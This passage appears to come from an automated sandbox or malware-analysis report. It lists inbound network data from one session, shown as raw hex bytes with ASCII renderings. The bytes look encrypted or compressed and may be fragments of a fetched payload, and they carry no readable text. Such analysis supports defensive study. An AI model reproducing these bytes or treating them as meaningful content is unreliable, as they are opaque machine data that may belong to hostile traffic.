fd c3 73 b8 fe 3e 67 83 02 99 4b 0a 9c 19 b1 4d 4a 00 ad cc e4 2c 82 83 Data Ascii: sAF!)qo_i'\|?=3y[F "^j]%[nB%3Uz}PcV'S?&nDo+?z7Gm`Kl+xuhG,(aEPWl8n&B\|CduhW lrwGc+d*[c%8\u[#1~~?Ws>gKMJ,
2021-12-01 18:26:22 UTC	288	IN	Data Raw: 7a 39 d3 30 8f ea 67 1a 6a 8b 9a 85 67 9f 4b a3 78 2c 29 cb f0 21 75 31 be 87 33 d0 31 21 22 20 a0 25 34 52 4a 08 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 68 32 4f f4 99 07 ec 98 f8 91 a6 23 31 14 cc ad 70 c8 7d 72 94 06 64 e3 c0 7a 0c be 6a cd 51 c1 26 fa 36 2d 11 5d 15 88 a7 e7 df f0 1e c3 88 4f 31 34 15 14 5a b6 f1 23 4a a3 ac fc ed 11 84 9a ae 26 7d 0b f0 4f ec ae 5f 60 b3 20 10 84 7b 8e c5 b5 79 51 8f 43 4c 1c cd 9b d5 45 ee 99 17 28 67 e7 57 5c dc ba 5d 53 59 ec 0f 9b 05 85 35 d0 27 8f 12 30 7c 62 f4 f3 a4 98 f3 d3 87 de 26 eb 7f 1a b5 68 2d 22 be ff 6e fe 15 6e ce 74 d8 38 54 a9 0b a8 7f 22 fd 8c d5 21 e9 d0 1f e0 e9 84 92 f2 38 d3 07 6d ae 0e a2 24 71 ec 92 3c 90 91 cc c9 e8 e2 48 e3 5f 19 8b 47 c5 a0 f0 fe 3f 88 6e 2a 13 Data Ascii: z90gjgKx,)!u131!" %4RJn8z??0FY/h2O#1p}rdzjQ&6-]O14Z#J&}O_` {yQCLE(gW\]SY5'0\|b&h-"nnt8T"!8m$q<H_G?n*
2021-12-01 18:26:22 UTC	290	IN	Data Raw: 8e cf 8c 60 bf 03 02 ca 3b 29 dd f8 ac f9 ef 5e 03 49 78 d9 0f 59 0d b2 b4 c3 5b b2 00 43 46 9a cf 7d 7c ba df bc 69 9c 69 d3 3d 92 6e 6c 5c f7 5c ae 2e f0 6d 7c 7c b2 5a 51 19 d0 a4 d9 c0 65 5e 0f ad d7 c5 bb 83 a2 e1 d5 25 fc 01 e3 00 ca d7 ca bd 04 d3 46 2f 8b b9 5b b1 e3 08 35 e6 af f9 4b 08 b1 87 e8 3e e6 f4 43 56 42 c3 ca bb a2 49 04 a9 2d bb 8a fd b1 d3 77 66 6c db 14 df e9 65 36 fd 0b 0e 5e e2 b3 19 eb 24 9b 65 99 0b d4 b4 a1 a3 00 ad a3 a0 4a 74 56 b6 40 b1 ba 9c 9b cb d2 f4 b8 28 03 06 66 ca 5f e6 8a 2c 7f 1f 33 a6 d0 d9 de e7 01 53 b4 fb 09 2c 8b 31 31 df d5 3c 40 2e 6f 9d 1d bb 04 07 bb 6f 65 6c 3c 31 3d 79 04 14 3a f5 46 0a 1d 42 cf ee e9 00 d4 fe 1e 77 ac 57 46 57 3f e6 12 2d f0 d6 c4 07 67 08 4c 32 7e 59 43 24 43 26 e4 74 24 dc 9f 4e d3 9c Data Ascii: `;)^IxY[CF}\|ii=nl\\.m\|\|ZQe^%F/[5K>CVBI-wfle6^$eJtV@(f_,3S,11<@.ooel<1=y:FBwWFW?-gL2~YC$C&t$N
2021-12-01 18:26:22 UTC	291	IN	Data Raw: 14 6a cd 0a a1 70 a3 46 95 59 43 64 7d 77 8b 17 73 be 9e 2e 42 f2 6f 65 7b 46 34 36 d8 94 47 65 af a0 f7 c9 10 85 9b af 27 7c 0a f0 55 11 4e 1b 1b 20 93 54 ff e8 3d 81 ce ea e2 ae 5f df c9 1d c5 52 f7 bb c5 91 9a 38 9d c5 ee 0e a8 c7 e1 1c 97 9c 28 d6 97 59 63 62 f4 81 83 ae 70 65 41 e1 e3 60 60 d4 b6 44 82 3b 61 26 db 2c 22 be 99 fe 9f 00 6e 8e 5a cd 38 08 a8 0e a8 f5 a0 2f d1 d4 20 e8 d1 1f e1 e8 85 73 f3 3b f3 0d 6d a1 1f a3 29 70 ed 93 37 91 90 cd c8 e9 e3 59 f9 5f d5 47 02 4e 4c a3 55 62 9c 38 a1 66 28 8d 70 0e 81 aa db b4 24 2f 35 b1 22 51 eb 60 77 99 df 6f f9 18 27 19 73 c5 4e 01 0c 75 87 9a c1 89 1c 2b 41 c9 ed b9 a0 2b 43 e2 e8 73 2d fb 29 4f ec 8d cf 0c 3b 6e 49 46 03 c2 b1 20 63 42 a2 f7 10 68 11 1d 2f e6 be b9 57 ba 6e 0c 03 3a d1 4c 85 81 cc Data Ascii: jpFYCd}ws.Boe{F46Ge'\|UN T=_R8(YcbpeA``D;a&,"nZ8/ s;m)p7Y_GNLUb8f(p$/5"Q`wo'sNu+A+Cs-)O;nIF cBh/Wn:L
2021-12-01 18:26:22 UTC	292	IN	Data Raw: 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e ab 2a 64 bb c3 f0 16 99 a5 fe 21 aa 37 63 f0 48 2c f8 7a 5a 3a 2e 3b c1 24 02 92 df 38 a2 d8 69 5f c1 c7 60 2c e2 87 5a 17 f2 05 25 e3 e9 28 bb 30 4e 00 7c f1 5b 0c 85 6e 6c 20 db da de e0 4c 95 2b b9 a4 e2 4f 94 Data Ascii: v/T%c5}K$e@0}[,SdvvPo]`z?g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!7cH,zZ:.;$8i_`,Z%(0N\|[nl L+O
2021-12-01 18:26:22 UTC	293	IN	Data Raw: 64 5d 1b 98 ec a2 d9 14 16 33 89 8d 0f 5c f2 86 6b b3 1d 40 42 b4 4e 4d da 96 00 99 28 49 cb 65 9e 15 20 8f 2e db 80 c0 40 b4 b4 4d 86 be 7a dd ce fd 17 81 1d cd 32 61 aa 22 c3 5b 02 89 ff 54 fc e8 ec b1 85 8e 36 8a 62 3e fe 25 ab 9a 83 bd 57 ed 03 4b 60 15 b7 e6 18 ef 4e d5 d7 bd 2e 00 81 1b 6b 2e 74 0c 0b e4 1d f8 3f 17 fd 57 b3 a4 99 6b 09 76 67 a4 fb 6f 24 ad 98 d0 91 15 a4 73 c5 d6 fd 5c d3 09 7c 1c 68 ba 7f 4f ac 60 24 0a 61 f1 01 00 a9 5b ca 32 1d 05 f0 6d 97 b2 de b7 a8 0f 7f 2e 31 3b 57 f3 8f ca 7e 44 22 5e d6 f8 03 2c 32 24 1c 5c d5 d0 b1 2d c0 3a 50 30 9a ea 30 ba 3a 5c 26 cd f4 29 00 86 29 c3 25 0b be d7 53 e7 fe f0 c5 59 7a a8 c7 1a 28 31 27 bf 8f 3e df a2 0b c5 17 59 e8 ff 5a f7 90 3d af 32 a4 66 e4 f0 d5 95 6e 17 db bb 42 3f a6 2f 7c 60 68 Data Ascii: d]3\k@BNM(Ie .@Mz2a"[T6b>%WK`N.k.t?Wkvgo$s\\|hO`$a[2m.1;W~D"^,2$\-:P00:\&))%SYz(1'>YZ=2fnB?/\|`h
2021-12-01 18:26:22 UTC	295	IN	Data Raw: f9 8a db 6e 1f db 38 c1 d9 ce 1b 10 53 80 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 83 4a 3a 37 27 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 ed 29 b9 29 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 de 3c 49 a3 0e 5a 2e 0d 7d c0 08 21 92 cf 04 81 d8 6b 5f c1 c7 64 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 57 7c 8b 3b 06 f7 0a 0d 54 ba fe a9 74 4d 95 2b b9 84 e2 4f 94 29 29 d2 8c a5 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 73 37 24 9d b5 c9 3e a2 ed ca a0 3d d4 a4 75 a9 b5 be cd 37 63 41 30 8c ea 4b 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 61 75 31 be a9 41 a3 43 42 22 20 a0 dd 34 52 4a 08 b4 b6 6e 38 78 3f 3f cd ae Data Ascii: n8SA, Q. mJ:7'9@DqQ@Q9+b("ni))JyqE{ip>d!A<IZ.}!k_dZ%(NW\|;TtM+O))h/jBns7$>=u7cA0Kn`K,)au1ACB" 4RJn8x??
2021-12-01 18:26:22 UTC	296	IN	Data Raw: 38 da 8f 7b 9d 21 a6 b8 db 09 2d ad 74 40 14 41 7f 31 ca 2a c9 4a 37 d5 36 81 cd b2 0e 13 02 52 c1 fb 1c 22 c2 85 ed d9 24 ec 43 96 e8 ac 56 b0 29 2f 68 74 cf 78 3b 97 0e 2d 65 2d 89 4c 6c 97 28 96 10 06 77 fb 57 88 d1 ea d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 fc 10 c1 2c a3 e3 93 13 c0 30 70 10 46 ca 0c c9 a3 1f 53 bf 61 5b 79 b8 63 8a 51 67 9e e7 73 c7 84 83 a0 28 21 b9 d1 16 39 71 1a a3 e6 48 b6 ce 6e 82 72 2a 86 f2 50 d7 9e 74 eb 73 f0 27 e0 f9 a7 f0 1f 62 ee e8 36 5a 6e 6a 04 05 25 a9 a4 27 d1 d6 a4 b3 6c 96 6e 42 60 23 50 04 35 45 33 28 1d af 33 2f b9 a8 85 5d ed df c6 03 87 f6 72 db 1e f1 d7 9a 6a 89 08 55 32 97 c9 c3 2b 36 3f e9 6d cd 5e 03 67 95 f0 79 d2 29 4e 3e 4a 0c 3b 7e 6f c5 5c cb da 68 d2 3a 25 07 3d 76 2c c2 6d e5 dd e0 Data Ascii: 8{!-t@A1J76R"$CV)/htx;-e-Ll(wWn\R4"Vsn,0pFSa[ycQgs(!9qHnrPts'b6Znj%'lnB`#P5E3(3/]rjU2+6?m^gy)N>J;~o\h:%=v,m
2021-12-01 18:26:22 UTC	297	IN	Data Raw: 79 3b 54 71 90 d3 e6 7b 69 5f 37 70 00 d6 a2 09 64 a8 b3 d3 16 a3 c7 dd 21 d1 f7 41 f0 f4 02 db 7a b9 00 0d 3b cd 27 21 92 e6 2b 81 d8 0f 70 c1 c7 ed c7 c0 87 98 88 d0 05 cc cc e9 28 ab 24 4e 77 49 bb 5b 28 df 5e 6c 20 58 ce a9 9a c2 a5 2b b9 6d d2 4f 94 e1 19 d2 8c b6 96 68 a9 9e d0 97 2f 35 86 42 df 12 8d 6e 33 8e 15 dd 9b 51 6b c3 99 ac 92 3d f0 94 47 a9 b5 bd ff 37 63 33 02 8c ea f8 28 6e 8b 24 b7 98 60 96 91 c0 2c d3 f9 f0 21 58 02 fe 87 57 e3 31 21 b1 13 a0 25 80 61 4a 08 35 85 6e 38 74 0b 3f cd bf 04 b7 04 64 c9 46 1d 3c e3 59 14 93 87 a0 32 aa c0 97 18 5c a3 f8 25 80 db 10 ac 83 d4 bd e9 56 2f fd 75 e4 a6 b2 15 a2 f9 0b a0 81 97 47 94 7d 74 65 7d 3b db 87 95 db a8 3e aa 72 59 75 7b fd 02 37 d9 7d 70 64 ae b4 c1 c9 11 c4 ad ae 26 18 3c f1 54 92 78 Data Ascii: y;Tq{i_7pd!Az;'!+p($NwI[(^l X+mOh/5Bn3Qk=G7c3(n$`,!XW1!%aJ5n8t?dF<Y2\%V/uG}te};>rYu{7}pd&<Tx
2021-12-01 18:26:22 UTC	299	IN	Data Raw: 75 0c 06 1f d4 ee 3d 79 26 39 15 25 a3 b0 f6 7d a9 74 02 79 cc af 7e 84 3a 4c 20 de fa 38 79 cf 4d a7 68 46 fa d9 20 a2 ac e6 e4 5a 66 bb d1 1c 00 30 04 be 87 2f d3 ce 39 ed 25 6b a6 82 15 af d9 69 8f 65 ed 28 a9 a1 c3 de 48 2d e9 89 46 2a 87 12 6d 71 0b ba b5 3e e2 d2 d0 f7 f5 c0 2d 23 ec 50 11 04 6c 5e 39 24 04 aa 39 34 b6 aa a6 5a fe 9b a3 75 3c b6 02 a8 67 f1 b6 ef 3c b6 09 40 02 93 bf 80 7a 64 4c be f1 98 37 6d 24 9d f0 36 c7 3d 36 79 e3 3c 7f 1b 31 86 3d bb 87 56 b6 3a 24 1e 5e 21 58 8c 18 88 6d c1 de 74 f0 d2 7c 5e d3 01 d6 b3 37 6c a8 e3 bc 3f 6e d3 3d b2 ec 38 2d de 01 84 ad 9d ec 61 4a 1a b6 f4 f7 27 11 ac 1f 41 f6 8a b4 7a df bf 5d a1 06 41 d1 ab 11 3e 49 97 2a c3 7c 1d fb 35 44 d3 b0 0e 78 7e c8 3e 9b 8a c8 42 3e 8e cc e4 75 ba 1c 5b 03 02 80 Data Ascii: u=y&9%}ty~:L 8yMhF Zf0/9%kie(H-Fmq>-#Pl^9$94Zu<g<@zdL7m$6=6y<1=V:$^!Xmt\|^7l?n=8-aJ'Az]A>I\|5Dx~>B>u[
2021-12-01 18:26:22 UTC	300	IN	Data Raw: 6b 68 d2 fb ca c9 05 c4 ce cf fa 4c 03 e4 27 b1 fc ff 01 5e 5a 45 b3 ff f8 5a ae fa c2 f3 58 9e c0 36 c6 d8 83 ac 59 07 14 30 fb 83 09 77 03 ef b4 e8 fb 09 18 c6 ae 48 6a a4 9d 4c 14 5f 9a d0 33 bd 52 48 71 45 ce 41 67 26 38 61 ba d1 2f 38 0d 56 51 a0 ed 54 99 69 77 94 15 78 c3 b3 0a 60 5d da ce 55 0e f4 fa 7b 3f c5 9d 4b cb bd 64 de a4 8f da be 29 6d 94 1b 29 fe d6 3b 06 af 62 f3 14 cc 23 c7 2c 30 0c 13 10 ba 87 f8 c9 f7 6d cf 92 2b 07 12 30 51 45 9d f4 32 05 ae d6 9f a7 7c e9 fe 80 4b 1e 62 a2 31 64 0b 68 73 57 f7 27 ba 88 48 e1 cf 86 80 c6 0c ba db d4 88 22 9b cf b3 f6 f5 4b 9d b2 87 61 c4 ab 84 33 fb fe 40 85 f3 2c 3b 0a 90 ec e6 ff 03 0b 23 e0 8f 08 05 bc f4 2a ed 54 05 44 ae 2d 55 d7 91 03 93 71 40 f3 58 bc 51 5b c7 60 c6 91 c2 5a d0 b8 48 8d b9 5b Data Ascii: khL'^ZEZX6Y0wHjL_3RHqEAg&8a/8VQTiwx`]U{?Kd)m);b#,0m+0QE2\|Kb1dhsW'H"Ka3@,;#*TD-Uq@XQ[`ZH[
2021-12-01 18:26:22 UTC	301	IN	Data Raw: bf a9 09 d0 c3 e8 dc fe d1 23 31 fb 23 27 6d 75 5a 3a 2d 47 a3 7e 31 aa 9d 94 4b c6 b0 a8 64 32 a4 15 db 4b 98 b3 f3 0b 84 18 79 23 85 ba a2 7c 71 3f 9e 98 81 33 6e 2d de f9 71 c2 21 01 4b f2 05 5e 0d 34 a4 3b ae f4 6c df 3f 38 29 6c 30 63 b2 08 8b 29 d3 c1 69 9d c8 71 1e d3 05 d6 f4 19 6c a4 eb a9 2e 4e a6 3d 9f ed 27 11 ab 14 a1 a7 bf f9 74 6e 10 92 e4 fb 26 74 a9 76 58 f2 89 bd 39 da e4 48 8f 07 5c c8 b1 09 1b 56 97 5a c3 7b 00 fc 25 51 fa b0 0f 0b 72 c6 3f f2 b2 d4 58 01 86 db af 60 cf 13 7d 18 1b a0 34 b3 02 ab 39 09 ad b0 d2 46 1f f7 5a 13 fd ae 49 b6 97 8e c7 7c 26 a8 b4 84 78 31 e0 7c 1c c9 53 e1 ae 55 64 34 d7 e7 d2 0a 76 6c 4d b5 8a ab 3f 46 3c c8 34 75 49 9b ef 49 bb ac d6 24 5a 2c 48 63 c9 60 4a c9 0a 63 1d 53 59 56 12 66 3c 54 9a 24 65 54 31 Data Ascii: #1#'muZ:-G~1Kd2Ky#\|q?3n-q!K^4;l?8)l0c)iql.N='tn&tvX9H\VZ{%Qr?X`}49FZI\|&x1\|SUd4vlM?F<4uII$Z,Hc`JcSYVf<T$eT1
2021-12-01 18:26:22 UTC	302	IN	Data Raw: 64 d6 77 7f bf 2a 72 ce bc 59 63 46 dd cd 5f 2b da fa 75 02 f7 8b 4e ed 82 7f cf a6 e1 d0 84 7d 7b 8e 1e 07 e1 d7 74 1f a9 0b d7 18 cc 2a f9 3c 6c 08 10 23 8c f4 fe e9 ec 5b cb 92 0a 75 16 2b 60 56 aa fe 15 0d c9 cf 97 a5 11 f3 f3 c0 4b 10 6f df 39 7d 1b 7b 69 4a c1 3c 99 87 5d ec cf 86 8e fb 3e ac c4 d4 88 22 9b cf e3 f3 f3 46 f0 a8 8a 21 c4 ab b4 7c e5 f6 70 bf f3 34 06 63 98 ed eb c0 30 00 36 81 8c 02 04 d5 c0 2c ed 57 0d 43 f4 40 4f d7 90 2f 9a 63 0f f0 52 bd 38 75 c5 67 c7 b5 d2 4d b5 bb 45 e9 a7 76 8e 84 e9 16 dc 57 9f 65 03 e1 6d c1 4d 1f 88 92 5b fd f8 a3 8a 84 8d 2b 9c 5f 6e e2 39 a8 cd 94 f0 52 e5 07 45 50 54 b5 fc 1e 9d 4c cb d1 b4 19 5f 87 15 72 71 56 17 13 a4 00 c9 6f 5e fe 5b b0 a9 d1 63 17 6b 5e 82 fb 79 2c b6 93 ae de 51 e4 28 e2 85 9d 3f Data Ascii: dwrYcF_+uN}{t<l#[u+`VKo9}{iJ<]>"F!\|p4c06,WC@O/cR8ugMEvWemM[+_n9REPTL_rqVo^[ck^y,Q(?
2021-12-01 18:26:22 UTC	304	IN	Data Raw: df 66 86 c0 5c 5e f9 09 c6 d9 33 6f 93 c5 a9 38 77 a6 27 9f e7 23 33 ba 4e 86 b4 ac ec 5c 72 32 bf f5 de 27 67 98 17 5f e8 b0 d0 23 df bc 40 af 0d 72 e2 b0 38 39 56 9d 58 f6 6c 1d c0 01 30 e9 bc 13 66 72 cb 75 ec 9c d7 49 1a 8d ef af 60 8a 16 66 19 04 99 35 e5 1b 83 5d 17 83 b3 c3 5d 14 c3 5a 13 b8 b1 52 bd 8c 95 d7 70 01 9a c0 a5 7e 33 f8 7c 1d e7 53 e9 b6 5d 40 3e be ef cf 2b 6d 51 57 b3 8d ab 33 64 04 a4 36 79 5a fe cb 4e 98 a0 ed 18 6a 7f 57 65 d5 79 6a de 43 14 0b 4c 52 72 11 45 77 4d ba 04 0c 6c 25 bf 8d a6 68 95 9d 6c 3f df 3c 04 34 4f 93 14 5c 9f be af 6e 06 ea f7 9f c4 f0 c6 86 c8 8f 5c 6c 1b 82 2d a8 5f ca 79 3d 18 07 f5 0c a5 3c 0c 98 4a 1f 73 57 fb 60 0b d5 9d a4 7f f7 84 b0 45 84 ae 20 86 2d 65 b5 3d 3f 5a 5d 54 b2 61 55 fb b0 6a 81 af 08 29 Data Ascii: f\^3o8w'#3N\r2'g_#@r89VXl0fruI`f5]]ZRp~3\|S]@>+mQW3d6yZNjWeyjCLRrEwMl%hl?<4O\n\l-_y=<JsW`E -e=?Z]TaUj)
2021-12-01 18:26:22 UTC	305	IN	Data Raw: 73 74 4c ff 31 d0 9e 5d f6 aa a4 96 db 0c ba db dd 8d 26 8e c9 82 e7 f1 7a fc b1 8b 0f de a7 96 78 d9 e8 5d 85 f3 2c 34 0c 99 f5 ef ca 71 13 29 8e 8f 0c 05 fb c0 24 f5 5f 2f 52 ae 7e 47 ca a9 01 92 60 03 fb 31 af 59 6e cd 41 dd 80 f4 40 a0 a7 44 99 b1 6d 85 a1 e1 13 96 5f 80 0c 1b c9 70 cf 45 15 c2 e5 57 e6 f4 83 bc 9c b7 36 89 2d 7c fb 36 b7 c5 b8 bb 5e ec 0b 58 13 4f bb f9 1e d2 54 d2 ef a9 33 59 87 74 71 7d 7b 12 0b ae 45 be 79 41 f5 79 a8 b9 a8 7c 13 76 54 c1 89 34 08 c2 f6 ed b6 24 8a 43 e2 e8 f0 f6 b6 29 40 48 3a cf 0c 33 a0 0e 42 65 41 89 6c 6c c7 28 f7 f0 2d 77 9e 57 c4 d1 b6 d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 53 eb 34 72 a3 e3 93 13 cd 9e 35 10 ba ca 0c c9 5f f3 16 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 da e5 28 0f cd b4 Data Ascii: stL1]&zx],4q)$_/R~G`1YnA@Dm_pEW6-\|6^XOT3Ytq}{EyAy\|vT4$C)@H:3BeAll(-wWn\R4"VsnS4r5_]y$+s(
2021-12-01 18:26:22 UTC	306	IN	Data Raw: 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 59 14 e7 7c 88 5b 28 85 6a 6c 20 db 01 56 9a 68 2d 2b b9 a4 e2 4f 94 0f 69 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee 15 37 63 43 3e 93 50 69 1a da Data Ascii: Po]`z?g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Y\|[(jl Vh-+Oih/jBn37$Z=u7cC>Pi
2021-12-01 18:26:22 UTC	307	IN	Data Raw: f5 e1 a4 72 e2 65 79 ca 32 69 dd f7 a3 9d 6f 7e 6e 1d d4 64 70 e8 e3 58 f9 0c 4f b8 8c 4d b8 b0 5d d6 89 1b d2 90 55 d6 8e 0e c8 ac e3 44 8b 32 2c e3 74 06 47 7d 17 46 ca 7b a1 19 37 90 b6 22 d8 ff 2e 7a 12 b4 01 fc 10 c0 8f 0a 05 e6 db 75 bc 69 18 1b 54 78 da 16 97 0f df 2c 3b f5 8b 82 11 5f 04 29 80 97 a5 b2 b8 38 24 cd 04 8e d0 e5 81 96 38 f3 16 40 72 34 91 b6 46 04 36 76 73 a5 c4 91 03 73 77 71 62 6f e3 93 13 cd 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 d7 b0 1d 8f 12 84 46 c4 cc a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 d2 e1 3f 8a df c6 03 7f d7 72 db 26 f1 d7 9a 44 f1 6c 34 46 f6 c9 c3 Data Ascii: rey2io~ndpXOM]UD2,tG}F{7".zuiTx,;_)8$8@r4F6vsswqbo0p_?S]y$+s(nMUwHnr*PFb6ZjFnB#P7WIiU?r&Dl4F
2021-12-01 18:26:22 UTC	309	IN	Data Raw: c9 e5 af 06 d2 c2 58 71 aa 38 00 51 39 7a 54 2b f6 13 82 03 62 2d c0 fe b2 87 ce e8 8f aa 69 22 6e 9e 28 cd 29 25 38 4a 79 b2 d1 45 cb 9e 28 ec 1a 75 42 3e 8f 27 26 bb 9d 84 54 99 e9 a7 63 aa d9 e1 b2 48 2c 15 38 5a 2e f0 79 c1 08 0d d1 df 04 d6 9b 69 5f d3 ef 60 e8 f1 af 5a a7 84 2d 25 e3 90 00 bb 14 e8 5f 7c 8b 82 00 85 6e 9a 08 db fe a6 b3 68 95 01 90 a4 e2 08 bd 0f 29 b6 a5 a3 a7 e7 80 aa e1 3b 06 6a b7 93 f6 98 bc 98 1a 37 24 c4 b1 b9 5a f9 b3 ab a0 60 da a4 75 d7 9f ee cd 90 49 43 30 40 c0 67 1a 9f a1 9a 85 8c 4b 4b a3 ef 07 29 cb be 0a 75 31 8b ac 33 d0 91 0a 22 20 63 0e 34 52 a0 23 d4 b6 7f 14 7a 3f 09 e1 80 30 e4 28 14 fd ce 31 ad d7 ea 38 2f b3 7a 1e 4f f4 8c 35 56 96 a4 08 af ee 93 81 cd e1 11 c4 29 1a 24 58 44 93 b4 3b 6b cc 26 8e 71 a2 25 ba Data Ascii: Xq8Q9zT+b-i"n()%8JyE(uB>'&TcH,8Z.yi_`Z-%_\|nh);j7$Z`uIC0@gKK)u13" c4R#z?0(18/zO5V)$XD;k&q%
2021-12-01 18:26:22 UTC	310	IN	Data Raw: 9e 44 24 46 5e bd 7a 7c 80 7a 0f 0a 25 fc 00 09 8f 49 99 74 04 12 9e 10 81 a5 f2 a0 ac 18 69 71 11 3d 50 f4 8c dc 59 43 38 17 d9 f2 6e 61 3a 39 1c 1f c7 cd d4 76 b9 74 02 79 cc af 7e 84 30 5b 26 d3 f8 15 18 d6 40 a5 60 2b d1 87 16 a9 86 f0 c9 5e 6a bf b4 19 24 3b 1a a0 82 66 f9 be 0b cc 36 58 bf 84 35 a5 b0 52 fd 76 ed 28 a5 a0 95 f0 68 0b d0 a5 5b 3e ec 25 76 61 62 b5 a1 2a 97 b7 f4 df f1 cf 3d 2d e9 4d 34 04 6c 5e 39 24 04 aa 39 05 af b3 98 6c e5 aa a8 67 7f 87 1e ba 5f a2 b8 ef 2a 95 2d 34 31 9f a7 ae 76 70 11 b9 9d 8e 27 50 26 85 fa 7c e7 48 1e 52 e7 31 68 11 32 ab 38 9c f4 76 df 35 3c 0b 7d 6a 7c ae 0c 9c 7a cb dd 69 94 f2 15 63 db 02 d6 d9 24 70 a6 c1 ab 06 45 d5 23 97 ee 2b 5e a9 09 9f b8 b7 ed 3b 4f 10 b4 e5 de 30 78 ad 13 5d d6 82 a3 27 df ad 40 Data Ascii: D$F^z\|z%Itiq=PYC8na:9vty~0[&@`+^j$;f6X5Rv(h[>%vab=-M4l^9$9lg_-41vp'P&\|HR1h28v5<}j\|zic$pE#+^;O0x]'@
2021-12-01 18:26:22 UTC	311	IN	Data Raw: 85 a6 14 89 c0 ea 39 ce 97 60 51 a6 9b 5a d4 66 1d 03 0e e2 35 4f c4 6e 1b 49 b5 93 c4 fe 46 f8 48 d0 e3 87 3b d1 7d 5b bd fe f0 d3 1a c0 c4 86 d6 2f 07 d4 2b 98 fd c8 2b 41 45 4b af c8 cd 28 aa f7 cc f7 3d 87 cd 1b c4 d8 8a e3 5a 00 2a 77 e9 9e 22 68 1c e4 e8 d6 ec 12 22 cd a7 7b 29 a6 93 48 32 54 8a de 5a b5 5d 45 72 52 cf 46 34 25 23 66 b9 db 0a 16 17 5c 56 8a e5 44 ee 6d 71 91 22 4d df b8 3a 14 42 d0 c9 7e 20 95 f3 5b 39 fb 95 44 c1 8a 42 c9 be 8e c8 9b 4a 7f fd 02 2d fd df 78 0f e2 66 c3 18 ee Data Ascii: 9`QZf5OnIFH;}[/++AEK(=Z*w"h"{)H2TZ]ErRF4%#f\VDmq"M:B~ [9DBJ-xf
2021-12-01 18:26:22 UTC	311	IN	Data Raw: 28 f5 3c 01 0a 10 1a 8c e9 f1 f8 fb 4d c5 93 1d 16 1e 46 59 54 b0 c6 23 0a ca e2 99 a4 7c e5 f4 ca 67 7d 7c 98 3a 7d 22 7e 34 4c f1 3c ad 8c 52 e4 8c 84 8e c2 3e b1 cb cc e1 2a 94 c2 b0 e1 f4 4c de aa 83 62 c8 a8 84 4a 96 ea 40 b8 fb 35 06 4d 98 e3 eb fc 14 0a 24 a3 8d 0c 0c b4 d9 21 d4 3a 0d 44 b3 7e 47 d0 9b 3d 8a 67 07 f0 56 99 38 6f c1 60 c5 99 c5 00 bd b6 48 ba b5 71 84 ba f0 00 9b 54 95 4d 6c cd 7d cb 7b 14 82 f6 65 e4 e3 a5 a7 8f b5 58 8e 36 77 e6 3a a1 8e 9d bd 56 db 0b 44 77 6b ae fd 12 f3 46 f1 b8 b6 39 44 b1 11 72 50 67 16 10 af 19 8d 79 43 f1 36 aa a4 91 63 17 66 1f ac ea 75 1e a7 82 a9 c4 4d fc 26 90 ac 91 22 92 29 2d 0b 73 9c 69 4f bc 67 27 09 25 d9 1e 03 a4 28 80 79 06 1a f3 33 ca bc d5 bb 96 0b 78 5a 35 37 58 e5 b0 cb 7e 41 56 1e dc f3 07 Data Ascii: 